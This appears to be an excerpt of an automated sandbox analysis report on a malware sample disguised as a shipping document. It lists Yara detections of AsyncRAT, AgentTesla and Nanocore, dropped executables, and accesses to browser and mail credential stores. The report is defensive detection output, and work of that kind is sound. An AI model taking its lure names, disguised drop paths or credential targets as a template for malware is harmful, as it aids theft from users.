                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Isgeprf.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\VLC2.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\VLC2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\VLC2.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_05A62654 GetUserNameW,
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    barindex
                    Yara detected AsyncRATShow sources
                    Source: Yara matchFile source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Isgeprf.exe PID: 6976, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: VLC2.exe PID: 6228, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: VLC2.exe PID: 6008, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\VLC2.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, type: DROPPED
                    Source: Yara matchFile source: 14.0.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.483921714.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.245444705.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Fdquqwatjjr.exe PID: 7032, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe, type: DROPPED
                    Source: Yara matchFile source: 5.0.Fdquqwatjjr.exe.4e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Fdquqwatjjr.exe.4e0000.0.unpack, type: UNPACKEDPE
                    Yara detected Nanocore RATShow sources
                    Source: Yara matchFile source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara matchFile source: 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Fdquqwatjjr.exe PID: 7032, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Detected Nanocore RatShow sources
                    Source: Icda.exeString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Icda.exe, 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                    Source: dhcpmon.exe, 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: dhcpmon.exe, 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueR